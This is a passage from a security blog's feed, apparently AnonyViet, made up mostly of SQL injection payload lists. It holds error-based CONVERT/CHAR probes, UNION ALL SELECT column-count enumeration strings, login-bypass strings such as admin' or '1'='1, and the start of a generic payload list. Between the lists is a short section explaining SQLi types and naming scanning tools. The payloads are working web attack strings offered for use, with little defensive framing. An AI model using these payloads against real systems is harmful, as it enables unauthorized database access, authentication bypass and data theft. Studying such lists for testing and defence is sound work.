AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
UNION ALL SELECT NULL 
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX'
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#</pre>
<h2 id="ftoc-cac-payload-sql-injection-bypass" class="ftwp-heading">The Payload SQL Injection Bypass</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">'-'
' '
'&amp;'
'^'
'*'
' or ''-'
' or '' '
' or ''&amp;'
' or ''^'
' or ''*'
"-"
" "
"&amp;"
"^"
"*"
" or ""-"
" or "" "
" or ""&amp;"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055</pre>
</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;42530&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;2&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (2 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;Danh s\u00e1ch Payload SQL Injection&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>  The article scored: 5/5 &#8211; (2 votes)</p>
</div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/list-of-sql-injection-payloads/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/03/cach-kich-hoat-gemini-developer-mode.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>SQL Injection Payload List</title>
		<link>https://en.anonyviet.com/sql-injection-payload-list/</link>
					<comments>https://en.anonyviet.com/sql-injection-payload-list/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 09 Sep 2023 01:00:24 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[List]]></category>
		<category><![CDATA[Payload]]></category>
		<category><![CDATA[SQL]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=13165</guid>

					<description><![CDATA[In this article, I will explain what SQL injection is, some common examples, explain how to find and exploit different types of SQL injection vulnerabilities, and how to prevent SQL injection. Join the channel Telegram belong to AnonyViet ???? Link ???? What is SQL injection (SQLi)? SQL injection is a web security vulnerability that allows [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>In this article, I will explain what SQL injection is, some common examples, explain how to find and exploit different types of SQL injection vulnerabilities, and <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fsql-injection-la-gi-lam-the-nao-de-ngan-chan-lo-hong-sql-injection%2F" class="local-link" rel="noopener">how to prevent SQL injection</a>.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> ???? <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  ????</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="13165" fifu-featured="1" decoding="async" fetchpriority="high" class="aligncenter wp-image-42531 size-full" src="https://anonyviet.com/wp-content/uploads/2022/07/1_zB5JlbMSA26pklzNRAmSEg.jpg" alt="SQL Injection Payload List" title="SQL Injection Payload List" width="611" height="354" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_zB5JlbMSA26pklzNRAmSEg.jpg 611w, https://anonyviet.com/wp-content/uploads/2022/07/1_zB5JlbMSA26pklzNRAmSEg-300x174.jpg 300w" sizes="(max-width: 611px) 100vw, 611px" title="SQL Injection 6 Payload List"/></p>
<h2 id="ftoc-sql-injection-sqli-la-gi" class="ftwp-heading">What is SQL injection (SQLi)?</h2>
<p>SQL injection is a web security vulnerability that allows attackers to interfere with queries an application makes to its database.  It often allows attackers to see data they wouldn&#8217;t normally be able to get.  Includes data belonging to the user or any other data that the application itself can access.  In many cases, an attacker can modify or delete this data, causing persistent changes to the application&#8217;s content or behavior.</p>
<p>In some situations, an attacker can escalate a SQL injection attack to compromise the server or back-end infrastructure or perform a denial of service attack.</p>
<h3 id="ftoc-cac-loai-sql-injection" class="ftwp-heading">Types of SQL injections:</h3>
<ul>
<li><strong>In-band SQLi (Classic SQLi):</strong> <strong>In-band SQLi</strong> is the most common and easiest to exploit SQL Injection attack method.  In-band SQL Injection occurs when an attacker can use the same communication channel to launch the attack and collect results.  The two most common types of SQL Injection are error-based SQLi and Union-based SQLi.</li>
<li><strong>Error-based SQLi:</strong> <strong>Error-based SQLi</strong> is an in-band SQL technique that relies on error messages issued by the database server to obtain information about the structure of the database.  In some cases, error-based SQL injection alone is enough for an attacker to enumerate the entire database.</li>
<li><strong>Union-based SQLi:</strong> <strong>SQLi is based on Union</strong> is an in-band SQL injection technique that uses the SQL UNION operator to combine the results of two or more SELECT statements into a single result, which is then returned as part of the HTTP response.</li>
<li><strong>SQLi Inference(Blind SQLi):</strong> <strong>SQLi Inference</strong>, unlike in-band SQL, can take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection.  In an SQLi Inference attack, no data is actually transferred through the web application and the attacker will not be able to see the results of an in-band attack (which is why Such an attack is often called a “blind SQL Injection attack”.  Instead, an attacker can rebuild the database structure by sending payloads, observing the web application&#8217;s response and the database server&#8217;s output.  The two types of inferential SQL Injection are Blind-boolean-based SQLi and blind-time-based SQLi.</li>
<li><strong>Boolean-based (content-based) blind SQLi: Boolean-based SQL Injection</strong> is an inference SQL Injection technique based on sending an SQL query to the database, forcing the application to return a different result depending on whether the query returns TRUE or FALSE.  Depending on the result, the content inside the HTTP response will change or stay the same.  This allows an attacker to infer whether the payload used returned true or false, even though no data from the database was returned.</li>
<li><strong>Time-based blind SQLi</strong>: <strong>Time-based SQL Injection</strong> is an inference SQL Injection technique based on sending an SQL query to the database, forcing the database to wait a specific amount of time (in seconds) before responding.  The response time will tell the attacker whether the result of the query is TRUE or FALSE.  Depending on the result, the HTTP response will be returned delayed or returned immediately.  This allows an attacker to infer whether the payload used returned true or false, even though no data from the database was returned.</li>
<li><strong>Out-of-band SQLi: Out-of-band SQL Injection</strong> not very common, mainly because it depends on the features enabled on the database server being used by the web application.  Out-of-band SQL Injection occurs when an attacker cannot use the same channel to launch the attack and collect results.  Out-of-band techniques,offer attackers an alternative to inference time-based techniques,especially if the server response is not very stable (making an attack based on unreliable inference time).</li>
<li><strong>Sound-based Sql Injection:</strong> This is a sql injection attack method that can be applied in applications that provide access to the database using voice commands.  An attacker can get information from the database by sending sql queries accompanied by audio.</li>
</ul>
<h3 id="ftoc-cac-cong-cu-quet-lo-hong-sql-injection" class="ftwp-heading">SQL Injection Vulnerability Scanning Tools:</h3>
<ul>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fsqlmapproject%2Fsqlmap" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">SQLMap</a> – Automated SQL injection and database scanning tool</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fron190%2Fjsql-injection" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">jSQL Injection</a> – Java tool for automatic SQL injection</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FNeohapsis%2Fbbqsql" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">BBQSQL</a> – A blind SQL-Injection exploit</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fcodingo%2FNoSQLMap" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">NoSQLMap</a> – Pwnage NoSQL databases automatically</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.kitploit.com%2F2017%2F05%2Fwhitewidow-sql-vulnerability-scanner.html" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Whitewidow</a> – SQL Vulnerability Scanner</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fstamparm%2FDSSS" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">DSSS</a> – Small SQLi Vulnerability Scanner</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fdtag-dev-sec%2Fexplo" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">explore</a> – Web vulnerability testing format</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fawnumar%2Fblind-sql-bitshifting" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Blind-Sql-Bitshifting</a> – Blind SQL-Injection via Bitshifting</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fleviathan-framework%2Fleviathan" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Leviathan</a> – Wide range of batch testing tools</li>
<li><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FJohnTroony%2FBlisqy" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Blisqy</a> – Exploiting time-based blind SQL injection in HTTP-Headers (MySQL/MariaDB)</li>
</ul>
<h2 id="ftoc-cac-payload-sql-injection-chung" class="ftwp-heading">Generic SQL Injection payloads</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">'&#13;
''&#13;
`&#13;
``&#13;
,&#13;
"&#13;
""&#13;
/&#13;
//&#13;
\&#13;
\\&#13;
;&#13;
' or "&#13;
-- or # &#13;
' OR '1&#13;
' OR 1 -- -&#13;
" OR "" = "&#13;
" OR 1 = 1 -- -&#13;
' OR '' = '&#13;
'='&#13;
'LIKE'&#13;
'=0--+&#13;
 OR 1=1&#13;
' OR 'x'='x&#13;
' AND id IS NULL; --&#13;
'''''''''''''UNION SELECT '2&#13;
%00&#13;
/*…*/ &#13;
+        addition, concatenate (or space in url)&#13;
||        (double pipe) concatenate&#13;
%        wildcard attribute indicator&#13;
@variable    local variable&#13;
@@variable    global variable&#13;
# Numeric&#13;
AND 1&#13;
AND 0&#13;
AND true&#13;
AND false&#13;
1-false&#13;
1-true&#13;
1*56&#13;
-2&#13;
1' ORDER BY 1--+&#13;
1' ORDER BY 2--+&#13;
